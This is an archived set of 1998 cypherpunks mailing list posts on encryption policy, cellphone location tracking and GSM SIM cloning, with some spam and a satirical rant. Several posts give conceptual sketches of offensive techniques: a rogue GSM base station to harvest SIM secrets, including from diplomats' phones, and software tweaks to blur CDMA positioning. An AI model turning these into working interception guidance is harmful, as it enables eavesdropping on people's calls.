>     and Public Interest Advocates to Discuss Encryption Policy
>
>
>                             Washington, DC
>                          Monday, June 8, 1998
>
>                  http://www.epic.org/events/crypto98/
>
>Top government officials -- including Senator John Ashcroft (R-MO),
>William Reinsch (Undersecretary of Commerce for Export Administration)
>and Robert Litt (Principal Associate Attorney General) -- will discuss
>current U.S. encryption policy at the largest policy conference on
>cryptography ever held in Washington, D.C.  Other leading experts from
>government, industry, public interest community and academia will also
>debate important legal, political technical  issues. If you are
>interested in cryptography policy, this is the one meeting you must
>attend!
>
>The 1998 EPIC Cryptography and Privacy Conference is organized by the
>Electronic Privacy Information Center, in cooperation with the Harvard
>University Information Infrastructure Project and the Technology
>Policy Research Group of the London School of Economics.
>
>
>- THE 1998 EPIC CRYPTOGRAPHY AND PRIVACY CONFERENCE -
>
>HIGHLIGHTS
>
>   o Meet the technical experts, industry leaders, litigators, and
>     policy makers who are shaping the global debate over encryption
>     and privacy.
>
>   o Get the latest news, reports, legislative information, and
>     technical results.
>
>   o Receive the 1998 edition of the highly-acclaimed EPIC Cryptography
>     and Privacy Sourcebook.
>
>
>THE PANELS
>
>   o Top US government officials will debate top industry
>     representatives on current U.S. policy on domestic restrictions,
>     export controls, and pending legislation.
>
>   o A panel of senior government officials from France, England,
>     Canada, Germany and the European Union will describe encryption
>     policies in their countries and future trends.
>
>   o Leading cryptographers and technical experts will discuss the
>     dangers and benefits of key escrow and key recovery systems and other
>     important technical issues.
>
>   o Attorneys representing the plaintiffs and the U.S. Government in
>     the pending legal challenges to the constitutionality of export
>     controls will discuss and debate the cases and their outcomes.
>
>
>FEES:
>
>Register before May 15 for reduced fee.
>
>   Standard
>
>       o $300.00 (before May 15) / $400.00 (after May 15)
>
>   Academic/Govt/501(c)(3)
>
>       o $150.00 (before May 15) / $200.00 (after May 15)
>
>
>MORE INFORMATION, FULL AGENDA AND ONLINE REGISTRATION:
>
>     http://www.epic.org/events/crypto98/
>
>

Kathleen M. Ellis   Admin. Asst., Electronic Privacy Information Center
Voice Mail:  (202)298-0833	           http://www.epic.org
PGP 5.0 Key ID 9bf725b4  65FF B997 62B8 C396 A527
		        2D6A 4901 F701 9BF7 25B4






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Armbrust <marka@ff.com>
Date: Tue, 21 Apr 1998 16:44:02 -0700 (PDT)
To: cryptography@c2.net
Subject: Re: Position escrow
In-Reply-To: <19980417175445.54922@die.com>
Message-ID: <3.0.3.32.19980421173331.009151b0@ff.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 4/21/98 -0700, you wrote:
>This is a really difficult issue. Even the most diehard cypherpunk
>cannot doubt the usefulness of a cellular position reporting
>capability in an emergency situation, when the user *wants* the cops
>or whoever to know where he is.  The big problem is how to keep it
>from being used (or abused) for "law enforcement" purposes without the
>consent of the user.

Don't archive the information -- supply it as part of the CNID.  If the
user has disabled caller-ID don't supply the location info either.

This depends on the integrity of the service provider and whether they have
the balls to stand up against CALEA.

--Mark

"The condition upon which God hath given liberty to man is eternal
vigilance which condition if he break, servitude is at once the consequence
of his crime, and the punishment of his guilt."

    John Philpott Curran, speech on the Right of election of the Mayor
    of Dublin, 1790.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 21 Apr 1998 17:39:25 -0700 (PDT)
To: Phil Karn <karn@Qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <19980417175445.54922@die.com>
Message-ID: <199804220039.RAA16621@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 4/21/98 -0700, Phil Karn wrote:
>This is a really difficult issue. Even the most diehard cypherpunk
>cannot doubt the usefulness of a cellular position reporting
>capability in an emergency situation, when the user *wants* the cops
>or whoever to know where he is.  The big problem is how to keep it
>from being used (or abused) for "law enforcement" purposes without the
>consent of the user.

Arguments about the "utility" of the technology are distracting - lots of
things are useful in some rare circumstances, not in others. If I were held
hostage in my apartment, I might wish there were hidden video cameras
installed in every room so the SWAT team snipers would be able to shoot the
bad guys without endangering me. If I were injured badly in a single-car
accident in a desolate place, I might wish that the government had the
means to track every automobile's location. The rest of the time, I think
those technologies are very distasteful and unwelcome. People dying of
thirst drink urine. It's not necessarily useful to use a worst-case
scenario when deciding how we'd like to organize and technologize our
ordinary lives.

The question is not whether or not cypherpunks want cellphone-locating
technology to be built - because it will be built. People who aren't happy
with that, for whatever reason, must fight that technology with technology
- arguments and proclamations are helpless against technology, as the
ridiculous export control "debate" makes clear. Once the technology exists,
it will be used.

What we need are cellphone remailers - they'll accept cellphone traffic
sent via nonstandard means (a different spread-spectrum
arrangement/protocol, or different frequencies for analog, or ..) and relay
it onto the ordinary (subject to surveillance) cell frequencies/spectrum.
Third parties who want to use ordinary/automated cellphone tracking systems
will get the physical address of the relay, not that of the phone. And
(hopefully) the relay won't keep logs of its traffic, nor attempt to track
down its users. (Operators of relays likely won't have access to nearly the
number of antennae/base stations that the regular cellphone folks do, so
it'll be harder for them to use trianguation and timing to derive physical
location. At least that's what my relatively RF-clueless understanding is.)
Do you (or other folks familiar with ham radio technology and repeater
technology) have any comments on the ease/difficulty of building a cellular
remailer? I assume it'd be necessary to modify a cellphone to use the
nonstandard remailer setup, which may be difficult.


>I expect the main countermeasure to cellular position tracking will be
>the use of one-way pagers. Keep your cell phone turned off, and if you
>get a page when you're someplace you don't want them to know, wait
>until you leave before you return the page.

But one-way pagers are a dying technology - and I'll bet that within 3-5
years, it'll no longer be possible to turn off cellphones, at least without
removing the batteries. I think that change won't be driven by surveillance
needs, but because the setup time required where the phone and the network
do their handshaking is annoying. It's likely to get worse as crypto is
added to cellphones, and if batteries get better it won't be crucial to
have the phone turned off when not in use.

Then again, you probably know a lot more about cellphone design than I do. 

>Perhaps if the "just turn it off" approach is widely promoted, the
>carriers and vendors will see the threat to their business and press
>for some safeguards. Otherwise they just won't give a damn.

If we want safeguards, we're going to have to build them ourselves. Laws
won't help, neither will carefully crafted, reasonable arguments. 


--
Greg Broiles        |History teaches that 'Trust us'
gbroiles@netbox.com |is no guarantee of due process.
                    |_Kasler v. Lundgren_, 98 CDOS 1581
                    |(March 4, 1998)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 21 Apr 1998 18:16:55 -0700 (PDT)
To: shamrock@netcom.com
Subject: Re: Position escrow
In-Reply-To: <Pine.SUN.3.91.980421153643.2922A-100000@netcom5>
Message-ID: <199804220116.SAA22628@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, given that I work in CDMA, and given that CDMA provides some
inherent positioning capabilities, the possibility of defeating
positioning by hacking the phone software to "dither" the return link
signal timing has occurred to me.  It wouldn't let you appear to be in
a different cell than the one you're in, but it would certainly
decrease the measurement precision. You could disable the dither if
you want when you make an E911 call.

What sweet revenge that would be against the government that inflicted
Selective Availability on all us civilian GPS users. :-)

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Animal Protection League <VirginTimmieSkirvinFellatesSheep@teenworld.poboxes.com>
Date: Tue, 21 Apr 1998 15:26:06 -0700 (PDT)
To: freedom-knight-advocates@jetcafe.org
Subject: Re: UDP for cybernothing.org
Message-ID: <2.2.32.19980422012139.006fbfc4@neptunenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 AM 4/21/98 -0700, J.D. Falk wrote:
>Thanks for using NetForward!
>http://www.netforward.com
>v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v
>
>On 04/21/98, Eureka Eleven <eureka11@email.msn.com> wrote: 
>
>> Please be advised that your domain has been
>> issued a UDP for your censorous actions on Usenet.
>
>	How interesting.  Would you be willing to explain exactly when
>	(assuming it's within the past two years) these actions took
>	place, hopefully with copies of the offending messages?

You must be dense to even ask.

>	Please also explain which type of UDP you have issued, and
>	who is participating, so that I'm not worried when those sites
>	don't get my messages.

Your worries are nobody else's concern.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 21 Apr 1998 18:54:01 -0700 (PDT)
To: cryptography@c2.net
Subject: Re: Position escrow
In-Reply-To: <199804220101.AA20326@world.std.com>
Message-ID: <199804220153.SAA22662@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I think you guys are worried about the wrong problem.

The E911 stuff is still years off. Even when it is deployed, it will
probably work only during a call, though this may depend on the exact
method.

In my opinion, idle cell registrations -- which are already standard
cellular system practice -- represent the far more serious privacy
threat.

The cellular network uses registrations to locate mobiles so that page
(incoming call) messages can be directed to the user's cell instead of
being inefficiently "flooded" over the entire network. (I note that
each AMPS paging channel is 10 kb/s while the usual one-way paging
system operates in flood mode at something like .5 - 2 kb/s. But
cellular phone calls have to go through in seconds, while pager
messages often take minutes.)

While these registrations are not quite as precise as the E911
locating stuff under discussion, they can be precise enough. They'll
locate you to a given cell and sector, to say nothing of a given city.
In many heavily populated places, cells are pretty small.  And most
importantly, registrations occur whenever the phone is on -- whether
or not it's in a call. Even the most heavily used phones probably
spend most of their time idle, and many less heavily used phones are
probably idle for days at a time.

While it would seem that a cellular carrier would have no reason to
log these messages, many do. The main reasons, as I understand them,
have to do with resolving roamer billing disputes and detecting
cloning fraud. 

The FBI is already slobbering all over these registration logs and has
been battling the CTIA to get them under CALEA -- even though Louie
Freeh specifically disclaimed an interest in them during the
Congressional hearings on CALEA.  So far the CTIA has resisted. But
knowing them, the problem is almost certainly about money and not
anything as inconsequential as personal privacy.

Phil








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yupin Mungdee <snickers@mejl.com>
Date: Tue, 21 Apr 1998 11:07:12 -0700 (PDT)
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: GSM cellphones cloned
In-Reply-To: <3.0.32.19980414153441.00691a18@jps.net>
Message-ID: <199804211806.LAA05732@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
>A technical description of the attack is at
>http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html

Does the attack work if the SIM is protected by an unknown PIN code?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Apr 1998 17:27:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DoD Zips Echelon
Message-ID: <199804220027.UAA14316@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


DoD News Briefing
Tuesday, April 21, 1998 - 1:45 p.m. (EDT)
Briefer: Captain Mike Doubleday, USN, DASD (PA)

        Q: Can you comment about a report recently to the European 
parliament concerning the development these last years of U.S. and 
British eavesdropping system called Echelon.

        A: I'm sorry to say I have absolutely nothing on that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Tue, 21 Apr 1998 17:51:05 -0700 (PDT)
To: Lucky Green <karn@Qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804212208.PAA22084@servo.qualcomm.com>
Message-ID: <19980421204814.A21521@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, Apr 21, 1998 at 04:43:38PM -0700, Lucky Green wrote:
> On Tue, 21 Apr 1998, Phil Karn wrote:
> 
> > This is a really difficult issue. Even the most diehard cypherpunk
> > cannot doubt the usefulness of a cellular position reporting
> > capability in an emergency situation, when the user *wants* the cops
> > or whoever to know where he is.  The big problem is how to keep it
> > from being used (or abused) for "law enforcement" purposes without the
> > consent of the user.
> 
> Usfull != good idea. If the information is available for some purposes, 
> it is, or soon will, become available for other purposes. The only way to 
> prevent this is to not make the information available for *any* purpose.
> 
> I gladly take the cellphone without 911 locator over the cellphone with 
> 24/7 postion escrow. Furthermore, I content that there is no middle 
> ground between the two. Assuming of course the phone doesn't have an 
> active locator device that can be enabled using a special 911 button.
> 

	I am afraid that I'm enough of a paraniod cynic to wonder as to
the motives of the FCC in establishing this hard and fast requirement.
I'm afraid the police state types who benefit have considerable access
to and influence in such places as the FCC (which is in part a federal
law enforcement agency), and clearly anybody who wants the capability
for tracking the sheeple certainly had a golden opportunity to sell it
as important for E911 and fraud control.   The fact this has, in fact,
been the public reason given doesn't convince me that darker
possibilities aren't important factors.   Mark my words, someone will
turn up the memo explaining the strategy in some FIOA  request in a few
years.

	Certainly a cooperative protocol could have been used such
that a mobile station would have the option of opting out of having
its position determined, but apparently not doing this has been
sold to the carriers as a business opportunity - namely charging
different rates depending on where the caller is when making the
call.   This has been trumpeted as allowing carriers to charge
low rates for cell calls at home where there is wired phone 
competition and gouging rates for calls from places where there
is no alternative...



	

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Geer <geer@world.std.com>
Date: Tue, 21 Apr 1998 18:01:50 -0700 (PDT)
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804212208.PAA22084@servo.qualcomm.com>
Message-ID: <199804220101.AA20326@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



    This is a really difficult issue.

And how.  

How does this interact with phones whose
access (telephone) number is non-unique?
Could where I am calling from be divorced
from what instrument I am using to call?
Is there a parallel between smearing the
signal over a spectrum of radio frequencies
and smearing the identifying information
over a spectrum of numbers? Could calls
to 911 carry no phone number but just
"here I am" information -- a panic button
function, in other words?

I imagine I sound like someone calling in
to an ASK THE EXPERTS radio show...

--dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Tue, 21 Apr 1998 18:16:00 -0700 (PDT)
To: cryptography@c2.net
Subject: GSM cellphones cloned - THREATS !!
Message-ID: <19980421211620.A22293@die.com>
MIME-Version: 1.0
Content-Type: text/plain


----- Forwarded message from Dave Emery <die@die.com> -----
> 
> Several radio enineers I talked with speculated that it /might/ even be
> possible to modify a standard GSM phone to act as a rouge "key reaper"
> base station. I am not a radio engineer and have no way to verify this
> claim.

	The modifications would be fairly major and rather difficult on
a surface mount high density low cost phone PC board.  A lot of the
stuff required is in ASICs in a typical phone, and they are not in
general easily adapted to playing a different role even if the full
design database and phone schematics are available to the hacker which
it would not be.

	On the other hand, some of the components of a standard GSM
phone  could be used to fill a number of functions in such an animal,
and a couple of partially stripped GSM phone PC cards would certainly be
useful as part of such.  I would see such a probe base station as a
briefcase size object run by a laptop or powerful palmtop spliced into
two or three hacked up phone PC cards with some added signal processing
logic in a FPGA or two (and maybe an added RF modem chip as well).
There would be a significant amount of software required, depending on
how completely one would have to emulate a base stations and mobile
switch.

	Of course some older phone designs might be less ASIC intensive
and more adaptable, although the 1.9 ghz PCS US versions are mostly
pretty recent.   And there may be some universal multi-standard brand
that is much more software configured than others and might be an easier
jumping off place - I certainly have not investigated this at all (nor
do I expect to).



	On another topic - privacy...


	Your break suggests that A3/A8 may have been deliberately
weakened to allow such SIM probing.   Intelligence agencies are not in
general  interested in cloning, but for those without access to whatever
magic hardware (or software) exists for cracking A5/1 at low cost in
real time, the ability to once recover the SIM secret allows easy
listening to all subsequent calls from that phone (or SIM) with no
required cracking hardware time or access.  And this is very valuable in
lots of situations, such as covert operations out of hotels in foreign
places where having highly classified A5 cracking boxes in tow would be
a significant security risk.

	And for countries with GSM phone systems interested in spying
on visiting diplomats, heads of state, or trade delegations who are using
their GSM phones in a roaming mode and depending on the fact the GSM home
switching office does not disclose their long term secret, such probing can
be quietly concealed in the real traffic of a legitimate base station.
The secrets recovered can then be used to crack traffic back in the
visitor's home country where he may be trusting his local system to
be secure.

	And the ability to probe the phones of visiting dignitaries from
nearby hotel rooms and recover their secrets must be awfully useful to
many even third rate intelligence operations - this allows listening to
all their subsequent traffic without requiring an A5/1 cracking
capability at all - let alone one that works real time from low cost
portable units.

	And even if there is some sanity test in GSM phone firmware that
would catch or prevent enough probes to crack the SIM secret, your 
physical access method allows black bag jobs to recover the SIM secret
of phones left poorly guarded for a few hours.   This alone
is very obviously of great use to intelligence types (at least unless
there is some hardware backdoor in the SIM to allow the readout in
seconds rather than hours).



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Tue, 21 Apr 1998 12:56:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GSM Security Study
Message-ID: <199804211916.VAA18518@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


> To assess this spin we offer extracts of a 1998 GSM System 
> Security Study:
> 
>   http://jya.com/gsm061088.htm  (44K + 3 images)

Looks like that is the 'two brown envelopes' doc from which Ross Anderson
reconstructed the A5 algorithm as reprinted in Applied Cryptography.

Racal Research writes that there were French, Swedish and British
proposals.  Ross indicated that the French one was chosen as A5, while
Julian Assange says that two different "A5" algorithms are in use.
What happened to the Swedish and the UK proposal?

Do you also have Appendix A and Section 8 of the A5 analysis?

They write that COMP128 was proposed 'by the German administration'.
Does anyone know which role the BSI (then called ZfCh) played in the
design of this algorithm?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 21 Apr 1998 19:21:52 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: Position escrow
Message-ID: <199804220221.WAA28566@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain


On 4/21/98 7:33 PM, Mark Armbrust (marka@ff.com)  passed this wisdom:

>At 03:08 PM 4/21/98 -0700, you wrote:
>>This is a really difficult issue. Even the most diehard cypherpunk
>>cannot doubt the usefulness of a cellular position reporting
>>capability in an emergency situation, when the user *wants* the cops
>>or whoever to know where he is.  The big problem is how to keep it
>>from being used (or abused) for "law enforcement" purposes without the
>>consent of the user.
>
>Don't archive the information -- supply it as part of the CNID.  If the
>user has disabled caller-ID don't supply the location info either.
>
>This depends on the integrity of the service provider and whether they have
>the balls to stand up against CALEA.

 It seems to me that security dependent upon someone else's ethics/guts 
or lack of them is no security at all.


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "I tried sniffing Coke once, but the ice cubes got stuck in my nose."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Apr 1998 19:23:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GAO's Latest on Domestic Terrorism
Message-ID: <199804220223.WAA00273@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The General Accounting Office published today its April 9 
report to Congress, "Combating Terrorism: Threat and Risk 
Assessments Can Help Prioritize and Target Program 
Investments." 

It reviews the status of the domestic preparedness program, 
and recommends that for continued funding cities be required 
to perform threat and risk assessments.

There's interesting discussion about the Feds sharing 
sensitive intelligence with locals. And, FEMA questions if it
will be legal to require cities to perform the assessments.

The report is available from GAO in PDF format:

   http://www.gao.gov/new.items/ns98074.pdf  (363K)

We offer an HTML conversion:

   http://jya.com/nsiad-98-74.htm  (78K + 4 images)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 21 Apr 1998 19:33:31 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: Position escrow
Message-ID: <199804220233.WAA31268@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 The idea of a 'cellular remailer' will run afoul of the fact that the
FCC has control of the spectrum allocations. Unlike an Internet remailer
where the FCC has little say, it is not likely that they would permit a
commercial enterprise that would be able to be setup and run in that
manner. I don't even mention 'non-commercial' as that spectrum is so
valuable there is no way it would ever be turned over to
'amateur/citizen' use ... it will either be setup according to the
FCC/FBI dictates or it won't exist.


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNT1W8D7r4fUXwraZAQE6oAf/RYtHSSlQSUqWTKgWgmMLj9avCxWFE02L
ckqs15RVjeMYAWT93aiQnvepMT5i48KRbE9PYJi89CoAFaiiboeQOW4KA+QF9YVN
+MoRDn+rsKjRsSwciKxwWN8ym9i6i/rLZW9CJ+6qHxPHkn3TLQlqUWCOw7M8gOMM
ut18hKl0uzufITSEtB1s9shUZxog67dXKkzSEqLY4WjNuNyJIAgFk4Ad/IU0OaaY
6nhgwygJ1UKWqhHXqompXi4JnZEUJZZSM4m6tqNOsu/qYuarHNusqVP46V4BHPIR
D0jqcJTMOPnaZA1V7T9OBtCDyNOf/25fTfIdEAa9skV1wvqM+AoOrw==
=x/eA
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "They that can give up essential liberty to obtain a little temporary 
  safety deserve neither liberty nor safety." -- Ben Franklin, ~1784






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jetta mf12 <Jettamf12@aol.com>
Date: Tue, 21 Apr 1998 21:18:23 -0700 (PDT)
Subject: here
Message-ID: <866ec756.353d6c2d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: Jettamf12@aol.com
Subject: here
From: Jetta mf12 <Jettamf12@aol.com>
Date: Wed, 22 Apr 1998 00:00:21 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.spree.com/divito/index.html">Click here to see my
pic</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 21 Apr 1998 15:14:30 -0700 (PDT)
To: Yupin Mungdee <snickers@mejl.com>
Subject: Re: GSM cellphones cloned
In-Reply-To: <199804211806.LAA05732@rigel.infonex.com>
Message-ID: <Pine.BSF.3.96.980422000948.25419B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Apr 1998, Yupin Mungdee wrote:

> Lucky Green wrote:
> >A technical description of the attack is at
> >http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html
> 
> Does the attack work if the SIM is protected by an unknown PIN code?

A software-only attack with the SIM in a reader will of course not work if
the SIM is pin protected. A hardware attack on the SIM might work. As
would an over-the-air attack, since the user has to unlock the SIM to use
the phone.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcus J. Ranum" <mjr@nfr.net>
Date: Tue, 21 Apr 1998 23:01:27 -0700 (PDT)
To: Phil Karn <die@die.com
Subject: Re: Position escrow
In-Reply-To: <19980417175445.54922@die.com>
Message-ID: <3.0.3.32.19980422014512.0069aa8c@mail.clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>I expect the main countermeasure to cellular position tracking will be
>the use of one-way pagers. Keep your cell phone turned off, and if you
>get a page when you're someplace you don't want them to know, wait
>until you leave before you return the page.

The best countermeasure is to reduce its usefulness to law enforcement
by reducing its success rate. If there's enough press coverage of the
fact that the capability exists, then clueful crooks will not use
cell phones. Just like with escrowed crypto, you'll only catch the
really DUMB terrorists. All technology aside, the best way to make
progress in this area would be if the next James Bond movie shows
the capability being used. Then even clueless crooks and drug dealers
will do the equivalent of "gosh, well, I saw it on TV!" and will
believe the threat. Hmmmm.... Makes me think that a great way to make
progress is for cypherpunks to start submitting scripts to hollywood
about presidents who get in massive trouble when their personal
communications are subpoenaed and crypto keys are de-escrowed to
prove that they had sex with office staff....

Nah, that's too stupid...

mjr.
--
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
work - http://www.nfr.net
home - http://www.clark.net/pub/mjr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Illuminatus Primus <vermont@gate.net>
Date: Tue, 21 Apr 1998 23:43:01 -0700 (PDT)
To: Phil Karn <karn@Qualcomm.com>
Subject: Re: Position escrow (triangulation, cell "remailers")
In-Reply-To: <199804220153.SAA22662@servo.qualcomm.com>
Message-ID: <Pine.LNX.3.96.980422021922.136K-100000@oto.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 21 Apr 1998, Phil Karn wrote:

> I think you guys are worried about the wrong problem.
> 
> The E911 stuff is still years off. Even when it is deployed, it will
> probably work only during a call, though this may depend on the exact
> method.
> 
> In my opinion, idle cell registrations -- which are already standard
> cellular system practice -- represent the far more serious privacy
> threat.
> 

Wasn't Kevin Mitnick tracked down by triangulating the location of his
cell phone?  If the feds (or whoever) want to find someone's signal, it
seems that the tools to do so are already out there.. Of course, idle cell
registrations greatly expands the time someone is given to track down a
signal..

If someone wanted to passively track everyone's position all the time,
there would need to be at least two direction-sensitive cell towers
covering each area, listening to the same calls all the time. There would
need to be at least three to properly locate someone walking along the
line between two towers.. 

That seems a bit expensive, unless enough overlapping tower ranges already
exist to do something like that.  The owners of the towers would probably
much prefer that the cell phones come equipped with a GPS. 

On cell "remailers": Why resend the cell signal?  Why not instead set up a
generic phone call resender, which could be used by cell users and
non-users alike?  As long as you use the call resender for all of your
important calls, the feds (and others) will find it very difficult to
figure out what cell phone ID to triangulate or home phone number to tap
:)

-vermont@gate.net, revolting from the oppression of the sun





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jake Shannon" <tigermann@email.msn.com>
Date: Tue, 21 Apr 1998 16:50:19 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: I would like for me to subscribe.
Message-ID: <003601bd6de4$868cfe00$bcb7fad0@default>
MIME-Version: 1.0
Content-Type: text/plain




I did not have time to search for the list server address and 
I want to subscribe to the cypherpunk list.  Thanks for your 
attention.
<FONT 
size=2>                                                            
Regards,
<FONT 
size=2>                                                                    
Jake


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 22 Apr 1998 06:50:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 4/0 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <353DF5C6.418F@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Epilogue 4/0 - SPACE ALIENS HIDE MY DRUGS!!!
_____________________________________________

		*** BIENFAIT NUTLY NEWS SPECIAL ***
	
		            *********************
		         ***KILL THE CHILDREN !!!***
		            *********************

  Thank you...I'm feeling much better (The rEvolution Is) NOW!

  As if confiscating the MeatSpace tools and CyberSpace home that the
Author uses to channel the violent demons warring to burst out of the
thin walls of moral character imprisoning them inside his brain wasn't
enough...

  THEY (TM) have been conspiring to inundate the Author with a multitude
of secret message transfers via the available cable channels in the
small community in which he resides. The blatantly subliminal messages
being ceaselessly spammed into the Author's MeatSpace environment, via
the TV cable originating at an underground Reptilain Nazi resort and spa
deep beneath LizardMoor Labs and Gold Retrievers.
  A typical day in the cleverly disguised nuclear/biological laboratory
in the small, quiet prairie town of Bienfait, Saskatchewan, begins with
a variety of subliminal messages pointing out to the Author that his
lifelong dream of being invited as a guest on the David Letterman TV
show, in order to confront him with the fact that the Author is carrying
Dave's baby (despite the lies being spread that it is really just a
'beer belly'), can never be realized unless he makes a concerted attempt
to cash in on the new, improved version of 'National Security,' commonly
known as 'Save The Children.'
[Editor's Note: Current polls indicate that unconstitutional laws and
criminal actions by those in authority are currently very difficult to
justify under the wrapped-flag of 'National Security', since an
increasing number of Americans are probing for weaknesses in that
security in order to judge the viability of attacking it in a
grass-roots rEvolution.
However, the 'Save The Children' scam seems to currently still be an
effective ruse for perpetrating all manner of self-serving
actions/injustices, due to the success of the government's efforts to
hide the fact that the 'innocent' children are murdering their parents,
classmates and total strangers at an increasing rate, by trying them as
'adults'.]

TV Reality:

Good Morning America: Interview with the authors of 'The War Against
Parents."
  Beats the drum of working parents being forced by government
regulation, corporate policy and economic reality into being overworked,
underpaid Bad Providers who get no financial support/breaks in the
razing of their children in today's society.
  Successful Singles and Childless Couples point out that they are all
in favor of 'saving' the children, as long as they are not expected to
pony-up their hard-earned cash to support the progeny of those who want
to multiply like rabbits at their expense.

Maury Povitch: Child Food Abuse! Felony Fat! Parents Tried As Adults!
  The Big Bones of government officials gets shoved up the rectums of
Big Boned citizens who are imprisoned and have their children taken away
for child abuse as a result of having 'overweight' children.
  The Defenders of Children Who Eat Too Much fail to point out that
society and government don't seem particularly concerned that these same
children, if they have no health coverage, or are 'protected' by an HMO
plan which needs to cut corners in order to give their chief officers
hefty pay increases, will be allowed to die untreated in a hospital
waiting room, at which point their parents will be guilty of 'felony'
child abuse.

CBC Midday News: Bad Medicine Reactions A Leading Cause of Death.
  Makes it obvious that even if the Felony Fat Kids prove to be
financially worthy of receiving medical treatment to counter the effects
of their parent's Child Food Abuse crimes, they still have a good chance
of dying from a bad reaction to the medicine being forced upon them by
government officials, and die, once again making their parents guilty of
'felony' child abuse.

The Fifth Estate: Save The Geese!
  A seemingly heartwarming story of CityGeese being saved from the
slaughterhouse by those who train them  to fly south for the winter
alongside of ultralight planes (complete with heartwarming scenes and
music from the official Made For TV Movie).
  THEY (TM) could not resist, however, slipping in a statement which
might seem innocuous on the surface, but is filled with deep, dark
meaning for he who realizes that, since he is now a toothless old fart
who can no longer receive messages from Mars through the fillings in his
